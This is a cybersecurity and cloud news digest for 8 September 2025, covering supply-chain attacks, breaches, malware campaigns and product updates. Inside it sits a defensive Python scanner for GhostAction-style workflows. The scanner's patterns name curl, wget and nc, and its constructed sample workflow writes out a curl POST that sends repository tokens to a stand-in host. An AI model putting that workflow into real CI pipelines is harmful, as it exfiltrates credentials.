Cybersecurity Brief

Cloud Upgrades Lead, As Supply-Chain Attacks and SAP Exploits Hit

Coverage: 08 Sept 2025 (UTC)

Platform teams rolled out performance and reliability enhancements while defenders confronted fresh software supply‑chain compromises. Google Cloud detailed a new Column Metadata (CMETA) index for BigQuery that prunes data blocks before scan, targeting major latency and cost reductions at extreme scale. At the same time, attackers hijacked widely used npm packages via a phished maintainer account, with BleepingComputer reporting malicious updates across modules with billions of weekly downloads.

Cloud platforms tighten performance and developer resilience

AWS expanded reliability features for large‑scale AI training with managed tiered checkpointing in SageMaker HyperPod, blending rapid in‑memory checkpoints with periodic durable snapshots to S3. The approach targets faster recovery after infrastructure interruptions and less I/O overhead during training, and integrates with PyTorch DCP with minimal code changes. Details and regional availability are outlined by AWS. In parallel, improvements to the Amazon Q Developer assistant inside SageMaker Unified Studio introduce broader chat and CLI support, plus Model Context Protocol integration for project‑aware automation and transparent resource usage, according to SageMaker. Why it matters: context‑aware assistance and faster checkpointing aim to reduce toil and improve recovery for ML teams operating at scale.

Google Cloud also highlighted a cloud‑first development path for automotive software with Horizon, an open‑source reference platform for Android Automotive OS. The tooling standardizes code‑build‑test pipelines, scales virtualized testing, and reports drastic build time reductions using innovations like ABFS and warmed caches, per Google Cloud. In the data plane, BigQuery’s new CMETA index (noted above) seeks substantial query pruning benefits without user management overhead.

Exploited enterprise ERP flaw demands urgent patching

A critical code‑injection vulnerability in SAP S/4HANA (CVE‑2025‑42957, CVSS 9.9) is under active exploitation despite vendor fixes released August 12. Reports describe low‑privileged abuse of an RFC‑exposed function to inject ABAP code, bypassing authorizations and potentially escalating to admin or OS‑level control. With S/4HANA central to finance and operations across industries, there is no workaround; organizations are urged to accelerate testing and deployment of the update, restrict and monitor RFC interfaces, and prepare incident response for potential compromises, per InfoSecurity. The takeaway: a month‑long patch cycle is mismatched against ongoing exploitation pressure.

Supply‑chain compromises widen across ecosystems

Two campaigns underscored the breadth of software supply‑chain exposure. In the npm ecosystem, a phished maintainer account pushed malicious updates to heavily used packages, injecting client‑side code that intercepts crypto‑related activity and rewrites destination addresses before users sign transactions—an operation researchers say manipulates page content and API calls across multiple layers. In parallel, the GhostAction operation abused GitHub Actions by injecting workflows that enumerated and exfiltrated secrets (npm/PyPI tokens, GitHub tokens, cloud keys) from at least 817 repositories, with an estimated 3,325 credentials stolen before takedown actions; outreach went to affected projects and platform security teams, according to BleepingComputer. Why it matters: CI/CD workflows and developer tokens remain high‑leverage pivots for adversaries, enabling silent package tampering and lateral access to cloud and SaaS environments.

Separately, new details on the Salesloft–Drift incident trace the breach to compromised GitHub access months earlier, with rogue workflows and later theft of OAuth tokens that were used against integrated customer platforms such as Salesforce and Google Workspace. Named organizations span multiple security vendors; remediation included isolating Drift, rotating credentials, and restoring integrations in a staged manner, reports BleepingComputer. The operational lesson is consistent: reduce token scope and lifetime, tighten integration controls, and monitor API activity for anomalies.

Intrusions, tooling, and confirmed breaches

On the malware front, Fortinet analyzed a phishing campaign deploying MostereRAT on Windows, chaining privilege escalation, service creation, and aggressive AV/EDR interference. The toolset supports 37 remote commands over mutually authenticated TLS, can install legitimate remote‑access tools such as AnyDesk and TightVNC, and establishes stealthy persistence while suppressing telemetry, per Fortinet. Researchers also documented a campaign that combines Google ads with crafted GitHub commit links to deliver a large MSI whose payloads are gated by GPU checks (GPUGate) to evade sandboxes; the sequence elevates privileges, suppresses Microsoft Defender, persists via scheduled tasks, and stages cross‑platform data‑theft payloads, according to The Hacker News.

Confirmed breaches continued. Wealthsimple reported a third‑party software compromise that exposed contact details and government identifiers for approximately 30,000 customers; the firm notified regulators and is offering two years of monitoring and identity protection, per InfoSecurity. Furniture retailer Lovesac disclosed unauthorized access between February 12 and March 3 with personal information stolen; enrollment for 24 months of credit monitoring is available to notified individuals, according to BleepingComputer.

A broader view from a weekly digest highlights OAuth token theft tied to a third‑party integration, active exploitation of high‑risk CVEs including a Sitecore issue, and evolving tradecraft such as Outlook VBA backdoors and IIS‑focused redirectors. Mitigations emphasize rapid token revocation, shortest‑possible credential lifetimes, accelerated patching for known‑exploited bugs, and tighter monitoring of API/SaaS integrations, per The Hacker News. The through‑line is clear: minimize trust in automation pipelines and integrations, and assume adversaries will probe developer tooling as persistently as production systems.

These and other news items from the day:

Mon, September 8, 2025

Attackers Inject Malware into Popular npm Packages

🚨 Attackers phished and hijacked a package maintainer's account via a fake support domain, then updated index.js files in multiple npm packages to inject a browser-based interceptor. The malicious code targets web clients, monitoring Ethereum, Bitcoin, Solana, Tron, Litecoin and Bitcoin Cash transactions and replacing wallet destinations to redirect funds. Affected packages collectively account for over 2.6 billion weekly downloads, making this a substantial supply-chain compromise. Investigation and remediation are ongoing.

Mon, September 8, 2025

BigQuery's CMETA: Column Metadata Index for Scale Performance

🔍 BigQuery's new Column Metadata (CMETA) index is an automated, highly scalable metadata index that improves query pruning and reduces compute for extremely large tables. CMETA stores snapshots of block- and column-level statistics and is maintained transparently by BigQuery with no user intervention. Early adopters report up to 60x faster queries and up to 10x lower slot usage for selective filters, particularly on clustered columns.

Mon, September 8, 2025

Critical Code-Injection Vulnerability in SAP S/4HANA

⚠ Security teams must urgently patch SAP S/4HANA after a critical code-injection flaw, CVE-2025-42957 (CVSS 9.9), was fixed by the vendor on August 12 and is now being exploited in the wild. The vulnerability allows a low-privilege user to inject arbitrary ABAP via an RFC-exposed function module, bypassing authorization checks and enabling admin-level control and potential OS interference. No workaround exists; timely patching across complex SAP landscapes is essential to prevent data theft, credential harvesting, backdoors, ransomware and operational disruption.

Mon, September 8, 2025

Running Node.js HTTP Servers on Cloudflare Workers Globally

🚀 Cloudflare has added support for the node:http client and server APIs in Workers, enabling developers to deploy existing Node.js HTTP applications at the edge with minimal code changes. This change makes frameworks like Express and Koa runnable on Workers with zero cold starts, automatic scaling, and reduced latency for global users. The client APIs are implemented on top of Workers' native fetch(), and server integration uses an internal bridge that registers listen(port) rather than binding TCP sockets. Some Node-specific features remain limited or unsupported (the Agent is effectively a no-op; trailers, early hints, 1xx responses, and TLS-specific options are not available).

Mon, September 8, 2025

Managed Tiered Checkpointing for Amazon SageMaker HyperPod

⚡ Amazon Web Services has announced general availability of managed tiered checkpointing for Amazon SageMaker HyperPod, a hybrid checkpointing capability that caches frequent checkpoints in CPU memory and periodically persists them to Amazon S3 for durability. The approach reduces model recovery time and minimizes training progress loss on large-scale clusters. It integrates with PyTorch Distributed Checkpoint (DCP) and is enabled via a CreateCluster/UpdateCluster API parameter; customers can use the sagemaker-checkpointing Python library to adopt it with minimal code changes. Currently available for HyperPod clusters using the EKS orchestrator.

Mon, September 8, 2025

Horizon: Accelerating AAOS Development with Google Cloud

🚗 Horizon is an open-source, cloud-native software factory developed by Google and Accenture to standardize platform development for Android Automotive OS (AAOS) and related embedded vehicle software. It promotes a virtual-first workflow using high-fidelity cloud devices, VHAL, virtio, and scalable Cuttlefish instances to enable elastic testing and rapid developer feedback. Innovations such as the Android Build File System (ABFS), containerized reproducible builds, and integrated code tooling have produced 10x–50x faster feedback in early deployments, reducing build times and supporting high-frequency, higher-quality releases.

Mon, September 8, 2025

Improved AI Assistance in Amazon SageMaker Unified Studio

🤖 Amazon Web Services announced enhancements to the Amazon Q Developer chat experience within SageMaker Unified Studio Jupyter notebooks and added a command-line interface for use in notebooks and the Code Editor. By integrating with Model Context Protocol (MCP) servers, the assistant becomes aware of project resources—data, compute, and code—and provides personalized, context-aware help. These updates aim to speed tasks like code refactoring, file edits, and troubleshooting while preserving transparency around assistant actions. The capabilities are available at no additional cost via the Amazon Q Developer Free Tier where SageMaker Unified Studio is offered; customers can enable Amazon Q Developer Pro for expanded functionality.

Mon, September 8, 2025

Google to Let Users Set AI Mode as Default Search Option

🔎 Google will let users set AI mode as their default search tab, replacing the traditional blue links view for those who opt in. The change will be user-controlled via a toggle or button so individuals can choose AI-driven summaries as their primary experience while the classic Web tab remains accessible. Google says it is studying the impact on ads and publishers.

Mon, September 8, 2025

Salesloft–Drift Supply Chain Breach and Weekly Recap

🔒 Salesloft has moved to take Drift offline after a supply‑chain compromise that resulted in the mass theft of OAuth tokens and unauthorized access to Salesforce data. Multiple large vendors — including Cloudflare, Google Workspace, PagerDuty, Palo Alto Networks, and Tenable — confirmed impact, and activity is attributed to clusters tracked as UNC6395 and GRUB1. The incident underscores how fragile integrations can be and the importance of token hygiene, rapid revocation, and enhanced monitoring to contain downstream exposure.

Mon, September 8, 2025

GhostAction GitHub Supply Chain Attack Exposes 3,325 Secrets

🚨 A GitHub supply chain campaign dubbed GhostAction has exposed 3,325 secrets across multiple package ecosystems and repositories. GitGuardian says attackers abused compromised maintainer accounts to insert malicious GitHub Actions workflows that trigger on push or manual dispatch, read repository secrets, and exfiltrate them via HTTP POST to an external domain. Compromised credentials include PyPI, npm, DockerHub, Cloudflare, AWS keys and database credentials; vendors were notified and many repositories reverted the changes.

Mon, September 8, 2025

Salesloft March GitHub Breach Led to Salesforce Data Theft

🔒 Salesloft says attackers first breached its GitHub account in March, enabling the theft of Drift OAuth tokens later abused to access customer systems. The stolen tokens were used in widespread Salesforce data-theft operations disclosed in August, affecting multiple enterprise customers. Salesloft engaged Mandiant, rotated credentials, isolated Drift infrastructure, and restored integrations after validating containment.

Mon, September 8, 2025

MostereRAT Campaign Uses EPL, mTLS, and Legitimate RATs

🛡️ FortiGuard Labs identified a sophisticated phishing campaign that chains an Easy Programming Language (EPL) runtime with multi-stage payloads to deploy MostereRAT. The initial dropper, based on a wxWidgets sample, creates SYSTEM services and decrypts modules that run in memory while presenting social‑engineering prompts. Operators use mTLS‑protected C2 channels, disable and block security tooling via WFP filters, and install legitimate remote access tools such as AnyDesk and TightVNC to secure covert, persistent full access.

Mon, September 8, 2025

Qualys, Tenable Confirm Access in Salesloft Drift Attack

🔐 Tenable and Qualys reported limited unauthorized access to parts of their Salesforce records after attackers stole OAuth tokens from the Salesloft Drift integration. The incidents exposed support-case subject lines, initial descriptions and basic business contact details, but neither vendor's products or core services were affected. Both firms disabled the Salesloft Drift app, revoked or rotated credentials, and said they are working with Salesforce and investigators to contain the impact.

Mon, September 8, 2025

18 Popular JavaScript Packages Hijacked to Steal Crypto

🔐 Aikido researchers found that at least 18 widely used JavaScript packages on NPM were briefly modified after a maintainer was phished, impacting libraries downloaded collectively more than two billion times weekly. The injected code acted as a stealthy browser interceptor, capturing and rewriting cryptocurrency wallet interactions and payment destinations to attacker-controlled accounts. The changes were rapidly removed, but experts warn the same vector could deliver far more disruptive supply-chain malware if not addressed. Security specialists urge mandatory phish-resistant 2FA and stronger commit attestation for high-impact packages.

Mon, September 8, 2025

GitHub Account Compromise Led to Salesloft Drift Breach

🔒 Salesloft says the breach tied to its Drift application began after a threat actor compromised its GitHub account. Google-owned Mandiant traced the actor, tracked as UNC6395, accessing the account from March through June 2025 and downloading repository content, adding a guest user and establishing workflows. Attackers then accessed Drift's AWS environment and obtained OAuth tokens used to reach customer data via integrations, prompting Salesloft to isolate Drift infrastructure and take the application offline on September 5, 2025. Salesloft recommends revoking API keys for third-party apps integrated with Drift, and Salesforce has restored most Salesloft integrations while keeping Drift disabled pending further remediation.

Mon, September 8, 2025

Wealthsimple Confirms Supply-Chain Breach Affecting 30,000

🔒 Wealthsimple has confirmed a supply-chain related data breach that exposed information for roughly 30,000 customers after software from a third-party vendor was compromised on August 30. The leaked data reportedly included contact details, government-issued IDs, Social Insurance Numbers, dates of birth, IP addresses and account numbers. Wealthsimple says passwords were not accessed, no client accounts were compromised and no funds were stolen. The firm says it contained the intrusion within hours, notified regulators and is offering affected customers two years of free credit monitoring, dark-web monitoring, identity theft protection and a dedicated support team.

Mon, September 8, 2025

GhostAction Supply-Chain Attack Steals 3,325 Secrets

🔒 GitGuardian uncovered a widespread supply-chain campaign it named GhostAction after detecting suspicious activity in a FastUUID GitHub repository. A compromised maintainer pushed a malicious GitHub Actions workflow that harvested secrets, initially capturing a PyPI token, and further investigation revealed hundreds of similar commits across multiple repositories. In total 3,325 secrets were exfiltrated from 817 repositories belonging to 327 users, with DockerHub credentials, GitHub tokens and npm tokens among the most common. GitGuardian notified platform security teams and many affected projects have begun reverting malicious changes while investigations continue.

Mon, September 8, 2025

Lovesac Confirms Data Breach Following Ransomware Claim

🔒 Lovesac reported a cybersecurity incident in which unauthorized actors accessed internal systems between February 12, 2025 and March 3, 2025, with the company detecting the activity on February 28, 2025. The notice to impacted individuals states that full names and additional personal information were stolen, although specific data elements and the total number of affected people were not disclosed. Lovesac says it remediated the intrusion within three days and currently has no indication the information has been misused, but it is advising vigilance for phishing and other fraud. The RansomHub ransomware group claimed responsibility and added Lovesac to its extortion portal; affected individuals are being offered 24 months of Experian credit monitoring.

Mon, September 8, 2025

GPUGate: Malware Uses Google Ads and GitHub Redirects

🔒 Cybersecurity researchers have disclosed a sophisticated malvertising campaign that leverages paid search ads and manipulated GitHub commit URLs to redirect victims to attacker-controlled infrastructure. The first-stage dropper is a bloated 128 MB MSI that evades many online sandboxes and employs a GPU-gated decryption routine dubbed GPUGate, which aborts on systems lacking a real GPU or proper drivers. The campaign uses a lookalike domain (gitpage[.]app) and a VBScript-to-PowerShell chain that gains admin privileges, adds Microsoft Defender exclusions, establishes persistence, and stages secondary payloads for data theft.

Mon, September 8, 2025

GhostAction Campaign Steals 3,325 Secrets via GitHub Actions

🔍 GitGuardian disclosed a GitHub Actions supply chain campaign named GhostAction that exfiltrated 3,325 secrets from 327 users across 817 repositories before being contained on September 5. Attackers injected malicious workflow files to harvest CI/CD tokens (including PYPI_API_TOKEN) and sent them via HTTP POST to an actor-controlled endpoint. GitGuardian coordinated with maintainers and registries to revert commits, set impacted packages to read-only, and notify vendors.

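The GhostAction items above (this one and the earlier GitGuardian summaries) describe a recognisable shape: a workflow that runs on push or manual dispatch, maps many repository secrets into its environment, and sends them with an HTTP POST to a domain the project never normally talks to. The following is an added example, not code from GitGuardian or from any affected project: a stdlib-only heuristic scanner that scores workflow files for that shape so a reviewer or a pre-merge check can flag them. The host allowlist, the scoring weights, both sample workflows and the sink host `secrets-sink.example` are constructed assumptions for the demonstration; a real deployment would tune the allowlist to the registries and APIs its pipelines legitimately use.

```python
"""Heuristic scanner for GhostAction-style secret-exfiltration workflows (added example)."""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import urlparse

# Assumption: hosts a release pipeline is normally expected to contact. Tune per organisation.
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org",
                 "registry.npmjs.org", "index.docker.io"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ENV_FROM_SECRET = re.compile(r"^\s*([A-Z0-9_]+):\s*\$\{\{\s*secrets\.", re.MULTILINE)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s'\"`)]*")
OUTBOUND_CMD = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
POST_HINT = re.compile(r"(?:\s-X\s*POST\b|\s(?:-d|--data|--data-binary|--data-raw|-F|--form)\b"
                       r"|-Method\s+Post)", re.IGNORECASE)


@dataclass
class Finding:
    triggers: List[str]
    secrets: List[str]
    external_hosts: List[str]
    outbound_with_secrets: bool
    score: int
    reasons: List[str]

    @property
    def suspicious(self) -> bool:
        return self.score >= 4  # assumption: threshold chosen for the demo


def find_triggers(text: str) -> List[str]:
    """Return trigger events from `on: push`, `on: [a, b]` or the block form, without a YAML parser."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^(\s*)on:\s*(.*)$", line)
        if not m:
            continue
        indent, inline = len(m.group(1)), m.group(2).strip()
        if inline:  # `on: push` or `on: [push, workflow_dispatch]`
            return [t.strip() for t in inline.strip("[]").split(",") if t.strip()]
        triggers, child_indent = [], None
        for nxt in lines[i + 1:]:
            if not nxt.strip():
                continue
            lead = len(nxt) - len(nxt.lstrip())
            if lead <= indent:
                break  # left the `on:` block
            child_indent = lead if child_indent is None else child_indent
            km = re.match(r"^\s*([A-Za-z_]+):", nxt)
            if km and lead == child_indent:
                triggers.append(km.group(1))
        return triggers
    return []


def scan_workflow(text: str) -> Finding:
    """Score one workflow file; the signals mirror the GhostAction description."""
    triggers = find_triggers(text)
    secrets = sorted(set(SECRET_REF.findall(text)))
    env_names = set(ENV_FROM_SECRET.findall(text))  # env vars populated from secrets
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    external = sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)
    score, reasons, outbound_with_secrets = 0, [], False
    if external:
        score += 2
        reasons.append("contacts non-allowlisted host(s): " + ", ".join(external))
    if len(secrets) >= 3:
        score += 2
        reasons.append(f"references {len(secrets)} distinct secrets (mass harvest)")
    if any(t in ("push", "workflow_dispatch") for t in triggers):
        score += 1
        reasons.append("runs on push or manual dispatch (attacker-triggerable)")
    for line in text.splitlines():
        if not (OUTBOUND_CMD.search(line) and POST_HINT.search(line)):
            continue
        score += 1
        reasons.append("outbound POST command: " + line.strip()[:60])
        carries_secret = bool(SECRET_REF.search(line)) or any(
            re.search(r"\$\{?(?:env:)?" + re.escape(n) + r"\b", line) for n in env_names)
        if carries_secret or any(h in line for h in external):
            score += 2
            outbound_with_secrets = True
            reasons.append("  ... carrying secret-derived data or aimed at an external host")
    return Finding(triggers, secrets, external, outbound_with_secrets, score, reasons)


# Constructed sample: the GhostAction shape (many secrets in env, POST to an unknown host).
MALICIOUS_WORKFLOW = """\
name: Build
on:
  push:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: collect
        env:
          PYPI_API_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -s -X POST -d "pypi=$PYPI_API_TOKEN&npm=$NPM_TOKEN" https://secrets-sink.example/collect
"""

# Constructed sample: an ordinary release pipeline using one secret and an allowlisted API.
BENIGN_WORKFLOW = """\
name: Release
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s https://api.github.com/repos/${{ github.repository }}/releases
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

if __name__ == "__main__":
    for label, wf in (("malicious", MALICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        f = scan_workflow(wf)
        print(f"{label}: score={f.score} suspicious={f.suspicious}")
        for r in f.reasons:
            print("  -", r)
```

The scanner is deliberately a triage aid rather than a verdict: the strongest single signal is an outbound POST that carries a secret-derived variable to a host outside the allowlist, which is exactly the pattern the GitGuardian write-up describes, while a legitimate publish step that uses one secret with a registry action scores zero.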
Mon, September 8, 2025

MostereRAT Targets Windows with Layered Stealth Tactics

🔒 FortiGuard Labs has uncovered MostereRAT, a Remote Access Trojan targeting Microsoft Windows that uses layered evasion and persistence techniques. Written in Easy Programming Language, the malware deploys a multi-stage chain, uses mutual TLS for C2 communication, and can disable Windows Update and antivirus processes. The campaign, aimed largely at Japanese users, begins with phishing emails that lead to a malicious Word download and installs services running at SYSTEM-level, while deploying remote access tools such as AnyDesk and TightVNC.

Mon, September 8, 2025

AWS WAF Now Available in Asia Pacific (Taipei) Region

🛡️ AWS WAF is now available in the AWS Asia Pacific (Taipei) Region, allowing customers to deploy web application firewall protections closer to their users. The service helps protect web applications from common exploits and automated bots that can affect availability, security, or resource consumption. Note that AWS WAF Bot Control with targeted inspection and the Anti-DDoS managed rule group are not currently available in this region.

Mon, September 8, 2025

German Companies Affected by 2024–2025 Cyberattacks

🔒 In 2024 and into 2025, a wide range of German companies — from small and mid-sized enterprises to publicly listed groups and critical-service providers — were struck by ransomware and other intrusions, causing operational disruptions, lost revenue, supply-chain effects and reputational harm. Notable victims include Volkswagen Group, Adidas, Samsung Germany and several defence and manufacturing firms, while IT service providers and regional utilities were also targeted. At least one company (Fasana GmbH) reported insolvency after an attack. The editorial team updates this list regularly, but it is not exhaustive.

Mon, September 8, 2025

Amazon SageMaker Unified Studio Adds Custom Blueprints

🔧 AWS announced general availability of Custom Blueprints in Amazon SageMaker Unified Studio, enabling customers to supply their own managed IAM policies when creating project roles. Teams can replace or augment the default service-managed policies and use custom AWS CloudFormation templates to define infrastructure and parameters for resources such as Amazon EMR on EC2, AWS Glue Data Catalog, and Amazon Redshift. Sample templates are available in the SageMaker documentation, and the capability is offered in all AWS Commercial Regions where the next-generation SageMaker is available.

Mon, September 8, 2025

Stopping Ransomware Before It Starts: Pre-Ransomware Insights

🔒 Cisco Talos Incident Response (Talos IR) analyzed pre-ransomware engagements from January 2023 through June 2025 to determine which controls most often prevented ransomware deployment. Rapid engagement with incident responders and near-immediate action on EDR/MDR alerts were the two strongest correlates of stopping encryption. Talos found that aggressive blocking and quarantine settings, strict identity and privilege controls, improved logging, and early notifications from partners materially increased the chance of eviction before encryption. The guidance focuses on securing remote services, credential protection, application allowlisting, and network segmentation.

Mon, September 8, 2025

Amazon CloudFront Adds IPv6 Origin Connectivity Support

🌐 Amazon CloudFront now supports IPv6 connectivity to origin servers, enabling end-to-end IPv6 content delivery for web applications. Customers can configure custom origins as IPv4-only (default), IPv6-only, or dual-stack; in dual-stack mode CloudFront will automatically balance requests across IPv4 and IPv6 addresses. IPv6 origin support is available in all supported AWS Commercial Regions and excludes Amazon S3 and VPC origins. This capability can improve performance for native IPv6 users and reduce pressure from IPv4 address exhaustion for origin infrastructure.

Mon, September 8, 2025

AWS WAF Adds Free Vended Logs Based on Request Volume

📣 AWS WAF now includes a free allocation of Vended Logs ingestion to CloudWatch: 500 MB for every 1 million WAF requests processed, provided at no additional cost. The allocation is applied automatically across WAF vended logs to CloudWatch, S3, and Firehose and is reconciled on your AWS bill at month end. Usage beyond the included allowance is charged at standard AWS WAF Vended Logs CloudWatch rates. This change helps reduce logging costs while preserving comprehensive security visibility and analytics.

Mon, September 8, 2025

Remote Access Abuse Signals Major Pre-Ransomware Risk

🔒 Cisco Talos finds abuses of remote access software and services are the most common pre-ransomware indicator, with threat actors leveraging legitimate tools such as RDP, PsExec, PowerShell and remote-support apps like AnyDesk and Microsoft Quick Assist. The report highlights credential dumping (for example, Mimikatz) and network discovery as other frequent TTPs. It recommends rapid response, MFA, application allowlisting and enhanced endpoint monitoring to limit ransomware execution.

Mon, September 8, 2025

Amazon Keyspaces supports now(), uuid(), and Duration types

🔧 Amazon Keyspaces (for Apache Cassandra) now supports the now() and uuid() functions in SELECT clauses, extending prior support in WHERE, INSERT, and UPDATE. It also introduces a native Duration data type to represent elapsed time between timestamps, removing the need to store intervals as strings or bytes. These updates improve Apache Cassandra compatibility and simplify time-based operations and identifier generation across AWS Commercial and GovCloud regions.

Mon, September 8, 2025

Reviewing AI Data Center Policies to Mitigate Risks

🔒 Investment in AI data centers is accelerating globally, creating not only rising energy demand and emissions but also an expanded surface of cyber threats. AI facilities rely on GPUs, ASICs and FPGAs, which introduce side-channel, memory-level and GPU-resident malware risks that differ from traditional CPU-focused threats. Organizations should require operators to implement supply-chain vetting, physical shielding (for example, Faraday cages), continuous model auditing and stronger personnel controls to reduce model exfiltration, poisoning and foreign infiltration.

Mon, September 8, 2025

German Cyberattack Forces Wehrle-Werk AG into Insolvency

🔒 Wehrle-Werk AG has filed for insolvency after 165 years of operation, citing a damaging cyberattack in May 2024 that severely disrupted production, communications and business processes. A provisional insolvency administrator has been appointed to secure operations, conduct talks with customers and suppliers, and arrange pre-financing of insolvency wages to ensure employee pay for the coming months. The Baden-Württemberg firm, which employs around 250 staff and specializes in environmental technology—thermal waste disposal, sewage sludge combustion for phosphorus recovery and wastewater treatment—reported that its subsidiaries in Switzerland, Spain, the UK, Russia and Malaysia are not affected.

Mon, September 8, 2025

AI in Government: Power, Policy, and Potential Misuse

🔍 Just months after Elon Musk’s retreat from his informal role guiding the Department of Government Efficiency (DOGE), the authors argue that DOGE’s AI agenda has largely consolidated political power rather than delivered public benefit. Promised efficiency gains and automation have produced few savings, while actions such as firing inspectors, weakening transparency and deploying an “AI Deregulation Decision Tool” have amplified partisan risk. The essay contrasts these outcomes with constructive alternatives—public disclosures, enforceable ethical frameworks, independent oversight and targeted uses like automated translation, benefits triage and case backlog reduction—to show how AI could serve the public interest if governed differently.

Mon, September 8, 2025

Amazon Neptune Analytics Now Supported in NetworkX

🚀 NetworkX now supports Amazon Neptune Analytics as a graph store, enabling developers to use familiar NetworkX APIs while transparently offloading heavy graph-algorithm workloads to Neptune’s scalable analytics engine. The integration provides Zero-ETL data handling, automatic provisioning and teardown for a serverless-like experience, and preserves existing Python workflows without refactoring code.

Mon, September 8, 2025

Signal adds opt-in end-to-end encrypted backups for chats

🔒 Signal has introduced an opt-in secure cloud backups feature that creates end-to-end encrypted archives of users' messages and recent media. The capability is available now in the Android beta and will be rolled out to iOS and desktop after testing completes. The free tier stores messages and up to 45 days of media within a 100 MiB limit; a paid $1.99/month plan raises storage to 100 GB and extends media retention. Backups occur daily, exclude soon-to-disappear and view-once messages, and are protected by a 64-character recovery key generated on-device that Signal never receives.

Mon, September 8, 2025

Networking and Security Trends Driving SASE Adoption

🔒 Secure Access Service Edge (SASE) combines networking and security into a unified, cloud-delivered platform designed for the realities of remote and hybrid work. With nearly half of knowledge workers operating remotely or in hybrid models and many organizations adopting cloud apps and distributed branches, traditional perimeter-based models are no longer sufficient. SASE addresses distributed access, policy consistency, and simplified management while reducing attack surface and operational complexity.

Mon, September 8, 2025

Onboarding Attacks: When Fake Hires Become Insider Threats

🔐 Attackers are increasingly bypassing email defenses by infiltrating organizations through the hiring process, as in the 'Jordan' example where a bogus hire gained broad access on day one. Remote recruiting, AI-generated profiles and deepfakes have turned identity into the new perimeter, undermining traditional vetting. Adopting zero standing privileges—with JIT/JEP, strict baselines and comprehensive auditing—and tools such as BeyondTrust Entitle can remove persistent access and automate time‑bound, auditable privilege grants.

Mon, September 8, 2025

Surge in Network Scans Targets Cisco ASA Devices Worldwide

🔎 Security researchers observed a large surge in network scans probing Cisco ASA login portals and Cisco IOS Telnet/SSH endpoints, with GreyNoise recording two major spikes in late August 2025. The second wave on August 26, 2025, was largely (about 80%) driven by a Brazilian botnet using roughly 17,000 IPs and overlapping Chrome-like user agents that suggest a common origin. Administrators are urged to apply the latest patches, enforce MFA for remote ASA logins, avoid exposing management pages and services directly, and use VPN concentrators, reverse proxies, geo-blocking, and rate limiting to reduce risk.

Mon, September 8, 2025

Calcio sports piracy network with 123M annual visits shut

🛑 Calcio, a major illegal sports-streaming platform that drew over 123 million visits in the past year across 134 domains, has been shut down after coordinated action by ACE and DAZN. The Moldova-based operator agreed to cease operations and transferred domains to ACE, which now redirects them to its Watch Legally site. The service had been especially popular in Italy, accounting for more than 80% of traffic.

Mon, September 8, 2025

Google Gen AI Training and Certification for Veterans

🎖️ Google Public Sector is opening registration for a no-cost, three-week virtual program, Google Launchpad for Veterans, offering foundational generative AI training and a path to the Gen AI Leader certification. The Gen AI Leader training includes a two-day kickoff on November 13–14, optional exam prep sessions, and a complimentary exam voucher. Participants will learn core LLM concepts, how to navigate the AI ecosystem, and practical business applications using Gemini and NotebookLM to drive organizational transformation.

Mon, September 8, 2025

CISA Priorities at 16th Billington CyberSecurity Summit

🔐 The Cybersecurity and Infrastructure Security Agency (CISA) will present senior leaders and experts at the 16th Annual Billington CyberSecurity Summit, Sept. 9–12 in Washington, D.C. Acting Director Madhu Gottumukkala and new Executive Assistant Director for Cybersecurity Nick Andersen will deliver fireside chats outlining CISA’s strategic objectives. Other sessions address vulnerability management, threat hunting, supply chain collaboration, and AI in code security. Registration is required.

Mon, September 8, 2025

Four-Step EASM Framework to Reduce External Cyber Risk

🔍 External Attack Surface Management (EASM) requires a continuous, automated approach to discover internet-facing assets, detect vulnerabilities and prioritize remediation. The article outlines a practical four-step process — asset identification and classification, risk detection, risk assessment, and prioritization and remediation — to reduce external cyber risk. A real-world Jenkins misconfiguration illustrates how shadow IT and configuration changes can expose sensitive data, and why centralized, recurrent EASM platforms that integrate with existing workflows and provide actionable guidance are essential. Effective defense combines a fast mean time to detect (MTTD) from tooling with responsive teams that deliver a timely mean time to remediate (MTTR).

Mon, September 8, 2025

Action1 vs WSUS: A Modern Approach to Patch Management

⚙️ This sponsored comparison contrasts Action1, a cloud-native patch management platform, with Microsoft's legacy WSUS. It examines installation, ongoing maintenance, patch coverage, remote delivery, automation, troubleshooting, and reporting. The piece argues that Action1 reduces infrastructure overhead, patches third-party apps, and supports remote endpoints without VPN. It concludes that Action1 better fits modern, hybrid environments and audit-driven compliance needs.

Mon, September 8, 2025

Is the CISO Role Broken? Rethinking Security Leadership

🧭 The article argues that the modern CISO role has become unmanageable for many practitioners and often fails to deliver meaningful, long-term change. It traces causes to short tenures, technologist backgrounds, and siloed corporate governance, and advocates splitting responsibilities by creating a senior CSO focused on business protection while returning the CISO to a technical, execution-oriented remit. The author urges CISOs to rebuild trust through demonstrable delivery rather than constant demands, and suggests this structural change will improve governance, tenure, and recruitment.

Mon, September 8, 2025

Ten Security Leadership Missteps That Damage Careers

🔒 Security leaders must avoid career-limiting behaviors that erode trust and effectiveness. The article outlines 10 common missteps — from failing to align security with business priorities and remaining purely technical to drawing inflexible red lines and mishandling AI — that stall advancement. It stresses practical shifts: become a business partner, balance risk with speed, improve asset visibility, foster relationships, and rehearse incident response to maintain credibility.
